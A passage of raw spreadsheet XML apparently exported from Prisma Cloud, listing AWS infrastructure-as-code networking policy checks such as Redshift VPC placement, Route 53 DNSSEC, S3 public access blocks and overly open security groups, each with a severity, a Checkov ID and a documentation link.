      <c r="Q1337" t="inlineStr"/>
      <c r="R1337" t="inlineStr"/>
      <c r="S1337" t="inlineStr"/>
      <c r="T1337" t="b">
        <v>0</v>
      </c>
      <c r="U1337" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1337" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-redshift-cluster</t>
        </is>
      </c>
      <c r="W1337" t="inlineStr">
        <is>
          <t>Ensure Redshift is not deployed outside of a VPC</t>
        </is>
      </c>
      <c r="X1337" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-redshift-is-not-deployed-outside-of-a-vpc</t>
        </is>
      </c>
      <c r="Y1337" t="inlineStr"/>
      <c r="Z1337" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_redshift_cluster"]}</t>
        </is>
      </c>
      <c r="AA1337" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1337" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1337" t="inlineStr">
        <is>
          <t>CKV_AWS_154</t>
        </is>
      </c>
      <c r="AD1337" t="b">
        <v>1</v>
      </c>
      <c r="AE1337" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1337" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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7" t="inlineStr">
        <is>
          <t>9a75182d-ed78-4827-b94d-bdb8af35b5b7</t>
        </is>
      </c>
      <c r="AI1337" t="inlineStr"/>
      <c r="AJ1337" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1337" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1338">
      <c r="A1338" t="inlineStr"/>
      <c r="B1338" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1338" s="2" t="inlineStr"/>
      <c r="D1338" t="inlineStr"/>
      <c r="E1338" t="inlineStr"/>
      <c r="F1338" t="inlineStr"/>
      <c r="G1338" t="b">
        <v>1</v>
      </c>
      <c r="H13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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1338" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-route,aws</t>
        </is>
      </c>
      <c r="K1338" t="inlineStr">
        <is>
          <t>AWS NAT Gateways are not utilized for the default route</t>
        </is>
      </c>
      <c r="L1338" t="inlineStr"/>
      <c r="M1338" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1338" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1338" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1338" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1338" t="inlineStr"/>
      <c r="R1338" t="inlineStr"/>
      <c r="S1338" t="inlineStr"/>
      <c r="T1338" t="b">
        <v>0</v>
      </c>
      <c r="U1338" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1338" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-route,aws-route-table</t>
        </is>
      </c>
      <c r="W1338" t="inlineStr">
        <is>
          <t>AWS NAT Gateways should be utilized for the default route</t>
        </is>
      </c>
      <c r="X1338" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-aws-nat-gateways-are-utilized-for-the-default-route</t>
        </is>
      </c>
      <c r="Y1338" t="inlineStr"/>
      <c r="Z1338" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_route", "aws_route_table"]}</t>
        </is>
      </c>
      <c r="AA1338" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1338" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1338" t="inlineStr">
        <is>
          <t>CKV2_AWS_35</t>
        </is>
      </c>
      <c r="AD1338" t="b">
        <v>1</v>
      </c>
      <c r="AE1338" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1338" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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8" t="inlineStr">
        <is>
          <t>954e9b67-ef6b-4bd4-9a6b-8fee29635057</t>
        </is>
      </c>
      <c r="AI1338" t="inlineStr"/>
      <c r="AJ1338" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1338" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1339">
      <c r="A1339" t="inlineStr"/>
      <c r="B1339" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1339" s="2" t="inlineStr"/>
      <c r="D1339" t="inlineStr"/>
      <c r="E1339" t="inlineStr"/>
      <c r="F1339" t="inlineStr"/>
      <c r="G1339" t="b">
        <v>1</v>
      </c>
      <c r="H13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39" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1339" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-route53</t>
        </is>
      </c>
      <c r="K1339" t="inlineStr">
        <is>
          <t>Domain Name System Security Extensions (DNSSEC) signing is not enabled for Amazon Route 53 public hosted zones</t>
        </is>
      </c>
      <c r="L1339" t="inlineStr"/>
      <c r="M1339" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1339" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1339" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1339" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1339" t="inlineStr"/>
      <c r="R1339" t="inlineStr"/>
      <c r="S1339" t="inlineStr"/>
      <c r="T1339" t="b">
        <v>0</v>
      </c>
      <c r="U1339" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1339" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-route53-zone</t>
        </is>
      </c>
      <c r="W1339" t="inlineStr">
        <is>
          <t>Ensure Domain Name System Security Extensions (DNSSEC) signing is enabled for Amazon Route 53 public hosted zones</t>
        </is>
      </c>
      <c r="X1339" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/bc-aws-2-38</t>
        </is>
      </c>
      <c r="Y1339" t="inlineStr"/>
      <c r="Z1339" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_route53_zone"]}</t>
        </is>
      </c>
      <c r="AA1339" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1339" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1339" t="inlineStr">
        <is>
          <t>CKV2_AWS_38</t>
        </is>
      </c>
      <c r="AD1339" t="b">
        <v>1</v>
      </c>
      <c r="AE1339" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1339" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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39" t="inlineStr">
        <is>
          <t>efa67a51-0df1-4f77-9939-a2d286f3ee34</t>
        </is>
      </c>
      <c r="AI1339" t="inlineStr"/>
      <c r="AJ1339" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1339" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1340">
      <c r="A1340" t="inlineStr"/>
      <c r="B1340" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1340" s="2" t="inlineStr"/>
      <c r="D1340" t="inlineStr"/>
      <c r="E1340" t="inlineStr"/>
      <c r="F1340" t="inlineStr"/>
      <c r="G1340" t="b">
        <v>1</v>
      </c>
      <c r="H13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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1340" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-s3</t>
        </is>
      </c>
      <c r="K1340" t="inlineStr">
        <is>
          <t>S3 Bucket does not have public access blocks</t>
        </is>
      </c>
      <c r="L1340" t="inlineStr"/>
      <c r="M1340" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1340" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1340" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1340" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1340" t="inlineStr"/>
      <c r="R1340" t="inlineStr"/>
      <c r="S1340" t="inlineStr">
        <is>
          <t>ruben_checkov,ruben_checkov_2</t>
        </is>
      </c>
      <c r="T1340" t="b">
        <v>0</v>
      </c>
      <c r="U1340" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1340" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-s3-bucket-public-access-block,aws-s3-bucket</t>
        </is>
      </c>
      <c r="W1340" t="inlineStr">
        <is>
          <t>Ensure that S3 bucket has a Public Access block</t>
        </is>
      </c>
      <c r="X1340" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/s3-bucket-should-have-public-access-blocks-defaults-to-false-if-the-public-access-block-is-not-attached</t>
        </is>
      </c>
      <c r="Y1340" t="inlineStr"/>
      <c r="Z1340" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_s3_bucket_public_access_block","aws_s3_bucket"]}</t>
        </is>
      </c>
      <c r="AA1340" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1340" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1340" t="inlineStr">
        <is>
          <t>CKV2_AWS_6</t>
        </is>
      </c>
      <c r="AD1340" t="b">
        <v>1</v>
      </c>
      <c r="AE1340" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1340" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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0" t="inlineStr">
        <is>
          <t>a4d00808-eabf-45b9-84fd-723ddfe0e6de</t>
        </is>
      </c>
      <c r="AI1340" t="inlineStr"/>
      <c r="AJ1340" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1340" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1341">
      <c r="A1341" t="inlineStr"/>
      <c r="B1341" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1341" s="2" t="inlineStr"/>
      <c r="D1341" t="inlineStr"/>
      <c r="E1341" t="inlineStr"/>
      <c r="F1341" t="inlineStr"/>
      <c r="G1341" t="b">
        <v>1</v>
      </c>
      <c r="H13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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1341" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-sagemaker</t>
        </is>
      </c>
      <c r="K1341" t="inlineStr">
        <is>
          <t>AWS SageMaker model does not use network isolation</t>
        </is>
      </c>
      <c r="L1341" t="inlineStr"/>
      <c r="M1341" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1341" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1341" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1341" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1341" t="inlineStr"/>
      <c r="R1341" t="inlineStr"/>
      <c r="S1341" t="inlineStr"/>
      <c r="T1341" t="b">
        <v>0</v>
      </c>
      <c r="U1341" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1341" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-sagemaker-model</t>
        </is>
      </c>
      <c r="W1341" t="inlineStr">
        <is>
          <t>Ensure Amazon SageMaker model uses network isolation</t>
        </is>
      </c>
      <c r="X1341" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/bc-aws-370</t>
        </is>
      </c>
      <c r="Y1341" t="inlineStr"/>
      <c r="Z1341" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_sagemaker_model"]}</t>
        </is>
      </c>
      <c r="AA1341" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1341" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1341" t="inlineStr">
        <is>
          <t>CKV_AWS_370</t>
        </is>
      </c>
      <c r="AD1341" t="b">
        <v>1</v>
      </c>
      <c r="AE1341" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1341" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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1" t="inlineStr">
        <is>
          <t>77949af0-d80d-4d7b-8a21-b34d13b96a1c</t>
        </is>
      </c>
      <c r="AI1341" t="inlineStr"/>
      <c r="AJ1341" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1341" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1342">
      <c r="A1342" t="inlineStr"/>
      <c r="B1342" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1342" s="2" t="inlineStr"/>
      <c r="D1342" t="inlineStr"/>
      <c r="E1342" t="inlineStr"/>
      <c r="F1342" t="inlineStr"/>
      <c r="G1342" t="b">
        <v>1</v>
      </c>
      <c r="H13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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1342" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-sagemaker</t>
        </is>
      </c>
      <c r="K1342" t="inlineStr">
        <is>
          <t>AWS SageMaker notebook instance IAM policy is overly permissive</t>
        </is>
      </c>
      <c r="L1342" t="inlineStr"/>
      <c r="M1342" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1342" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1342" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1342" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1342" t="inlineStr"/>
      <c r="R1342" t="inlineStr"/>
      <c r="S1342" t="inlineStr"/>
      <c r="T1342" t="b">
        <v>0</v>
      </c>
      <c r="U1342" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1342" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-sagemaker-notebook-instance</t>
        </is>
      </c>
      <c r="W1342" t="inlineStr">
        <is>
          <t>Ensure SageMaker notebook instance IAM policy is not overly permissive</t>
        </is>
      </c>
      <c r="X1342" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/bc-aws-2-68</t>
        </is>
      </c>
      <c r="Y1342" t="inlineStr"/>
      <c r="Z1342" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_sagemaker_notebook_instance"]}</t>
        </is>
      </c>
      <c r="AA1342" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1342" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1342" t="inlineStr">
        <is>
          <t>CKV2_AWS_68</t>
        </is>
      </c>
      <c r="AD1342" t="b">
        <v>1</v>
      </c>
      <c r="AE1342" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1342" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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2" t="inlineStr">
        <is>
          <t>7e7337ea-9656-4078-875b-4fafed35b77d</t>
        </is>
      </c>
      <c r="AI1342" t="inlineStr"/>
      <c r="AJ1342" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1342" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1343">
      <c r="A1343" t="inlineStr"/>
      <c r="B1343" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1343" s="2" t="inlineStr"/>
      <c r="D1343" t="inlineStr"/>
      <c r="E1343" t="inlineStr"/>
      <c r="F1343" t="inlineStr"/>
      <c r="G1343" t="b">
        <v>1</v>
      </c>
      <c r="H13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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1343" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-security</t>
        </is>
      </c>
      <c r="K1343" t="inlineStr">
        <is>
          <t>Security Groups are not attached to EC2 instances or ENIs</t>
        </is>
      </c>
      <c r="L1343" t="inlineStr"/>
      <c r="M1343" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1343" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1343" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1343" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1343" t="inlineStr"/>
      <c r="R1343" t="inlineStr"/>
      <c r="S1343" t="inlineStr"/>
      <c r="T1343" t="b">
        <v>0</v>
      </c>
      <c r="U1343" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1343" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-security-group,aws-alb,aws-codebuild-project,aws-db-instance,aws-dms-replication-instance,aws-docdb-cluster,aws-ecs-service,aws-efs-mount-target,aws-eks-cluster,aws-eks-node-group,aws-elasticache-cluster,aws-elasticsearch-domain,aws-elb,aws-instance,aws-lambda-function,aws-lb,aws-mq-broker,aws-msk-cluster,aws-neptune-cluster,aws-network-interface,aws-rds-cluster,aws-redshift-cluster,aws-sagemaker-notebook-instance</t>
        </is>
      </c>
      <c r="W1343" t="inlineStr">
        <is>
          <t>Ensure that Security Groups are attached to another resource</t>
        </is>
      </c>
      <c r="X1343" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-that-security-groups-are-attached-to-ec2-instances-or-elastic-network-interfaces-enis</t>
        </is>
      </c>
      <c r="Y1343" t="inlineStr"/>
      <c r="Z1343" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_security_group","aws_alb","aws_codebuild_project","aws_db_instance","aws_dms_replication_instance","aws_docdb_cluster","aws_ecs_service","aws_efs_mount_target","aws_eks_cluster","aws_eks_node_group","aws_elasticache_cluster","aws_elasticsearch_domain","aws_elb","aws_instance","aws_lambda_function","aws_lb","aws_mq_broker","aws_msk_cluster","aws_neptune_cluster","aws_network_interface","aws_rds_cluster","aws_redshift_cluster","aws_sagemaker_notebook_instance"]}</t>
        </is>
      </c>
      <c r="AA1343" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1343" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1343" t="inlineStr">
        <is>
          <t>CKV2_AWS_5</t>
        </is>
      </c>
      <c r="AD1343" t="b">
        <v>1</v>
      </c>
      <c r="AE1343" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1343" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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3" t="inlineStr">
        <is>
          <t>df306deb-99ec-42d0-943b-f986854d7656</t>
        </is>
      </c>
      <c r="AI1343" t="inlineStr"/>
      <c r="AJ1343" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1343" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1344">
      <c r="A1344" t="inlineStr"/>
      <c r="B1344" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1344" s="2" t="inlineStr"/>
      <c r="D1344" t="inlineStr"/>
      <c r="E1344" t="inlineStr"/>
      <c r="F1344" t="inlineStr"/>
      <c r="G1344" t="b">
        <v>1</v>
      </c>
      <c r="H13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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1344" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-security</t>
        </is>
      </c>
      <c r="K1344" t="inlineStr">
        <is>
          <t>AWS Security Group allows all traffic on all ports</t>
        </is>
      </c>
      <c r="L1344" t="inlineStr"/>
      <c r="M1344" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1344" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1344" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1344" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1344" t="inlineStr"/>
      <c r="R1344" t="inlineStr"/>
      <c r="S1344" t="inlineStr"/>
      <c r="T1344" t="b">
        <v>0</v>
      </c>
      <c r="U1344" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1344" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-security-group,aws-security-group-rule</t>
        </is>
      </c>
      <c r="W1344" t="inlineStr">
        <is>
          <t>Ensure AWS Security Group does not allow all traffic on all ports</t>
        </is>
      </c>
      <c r="X1344" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-aws-security-group-does-not-allow-all-traffic-on-all-ports</t>
        </is>
      </c>
      <c r="Y1344" t="inlineStr"/>
      <c r="Z1344" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_security_group", "aws_security_group_rule"]}</t>
        </is>
      </c>
      <c r="AA1344" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1344" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1344" t="inlineStr">
        <is>
          <t>CKV_AWS_277</t>
        </is>
      </c>
      <c r="AD1344" t="b">
        <v>1</v>
      </c>
      <c r="AE1344" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1344" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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4" t="inlineStr">
        <is>
          <t>10b368a7-3def-41cb-9114-39354b7674ae</t>
        </is>
      </c>
      <c r="AI1344" t="inlineStr"/>
      <c r="AJ1344" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1344" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1345">
      <c r="A1345" t="inlineStr"/>
      <c r="B1345" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1345" s="2" t="inlineStr"/>
      <c r="D1345" t="inlineStr"/>
      <c r="E1345" t="inlineStr"/>
      <c r="F1345" t="inlineStr"/>
      <c r="G1345" t="b">
        <v>1</v>
      </c>
      <c r="H13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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1345" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-security</t>
        </is>
      </c>
      <c r="K1345" t="inlineStr">
        <is>
          <t>Not every Security Group rule has a description</t>
        </is>
      </c>
      <c r="L1345" t="inlineStr"/>
      <c r="M1345" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1345" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1345" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1345" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1345" t="inlineStr"/>
      <c r="R1345" t="inlineStr"/>
      <c r="S1345" t="inlineStr"/>
      <c r="T1345" t="b">
        <v>0</v>
      </c>
      <c r="U1345" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1345" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-security-group,aws-security-group-rule,aws-db-security-group,aws-elasticache-security-group,aws-redshift-security-group</t>
        </is>
      </c>
      <c r="W1345" t="inlineStr">
        <is>
          <t>Ensure every security groups rule has a description</t>
        </is>
      </c>
      <c r="X1345" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/networking-31</t>
        </is>
      </c>
      <c r="Y1345" t="inlineStr"/>
      <c r="Z1345" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_security_group","aws_security_group_rule","aws_db_security_group","aws_elasticache_security_group","aws_redshift_security_group"]}</t>
        </is>
      </c>
      <c r="AA1345" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1345" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1345" t="inlineStr">
        <is>
          <t>CKV_AWS_23</t>
        </is>
      </c>
      <c r="AD1345" t="b">
        <v>1</v>
      </c>
      <c r="AE1345" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1345" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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5" t="inlineStr">
        <is>
          <t>3c39f667-b442-4e79-90b2-55161c70d060</t>
        </is>
      </c>
      <c r="AI1345" t="inlineStr"/>
      <c r="AJ1345" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1345" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1346">
      <c r="A1346" t="inlineStr"/>
      <c r="B1346" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1346" s="2" t="inlineStr"/>
      <c r="D1346" t="inlineStr"/>
      <c r="E1346" t="inlineStr"/>
      <c r="F1346" t="inlineStr"/>
      <c r="G1346" t="b">
        <v>1</v>
      </c>
      <c r="H13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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1346" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-security</t>
        </is>
      </c>
      <c r="K1346" t="inlineStr">
        <is>
          <t>AWS security groups allow ingress from 0.0.0.0/0 to port 80</t>
        </is>
      </c>
      <c r="L1346" t="inlineStr"/>
      <c r="M1346" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1346" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1346" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1346" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1346" t="inlineStr"/>
      <c r="R1346" t="inlineStr"/>
      <c r="S1346" t="inlineStr"/>
      <c r="T1346" t="b">
        <v>0</v>
      </c>
      <c r="U1346" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1346" t="inlineStr">
        <is>
          <t>IaC:Networking:aws-security-group-rule,AWS::EC2::SecurityGroup,aws-security-group,AWS::EC2::SecurityGroupIngress</t>
        </is>
      </c>
      <c r="W1346" t="inlineStr">
        <is>
          <t>Ensure no security groups allow ingress from 0.0.0.0:0 to port 80</t>
        </is>
      </c>
      <c r="X1346" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-aws-security-groups-do-not-allow-ingress-from-00000-to-port-80</t>
        </is>
      </c>
      <c r="Y1346" t="inlineStr"/>
      <c r="Z1346" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["aws_security_group_rule", "AWS::EC2::SecurityGroup", "aws_security_group", "AWS::EC2::SecurityGroupIngress"]}</t>
        </is>
      </c>
      <c r="AA1346" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1346" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1346" t="inlineStr">
        <is>
          <t>CKV_AWS_260</t>
        </is>
      </c>
      <c r="AD1346" t="b">
        <v>1</v>
      </c>
      <c r="AE1346" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1346" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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6" t="inlineStr">
        <is>
          <t>f4d22869-f19a-4a8c-86c8-eaeb0d9e1056</t>
        </is>
      </c>
      <c r="AI1346" t="inlineStr"/>
      <c r="AJ1346" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1346" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
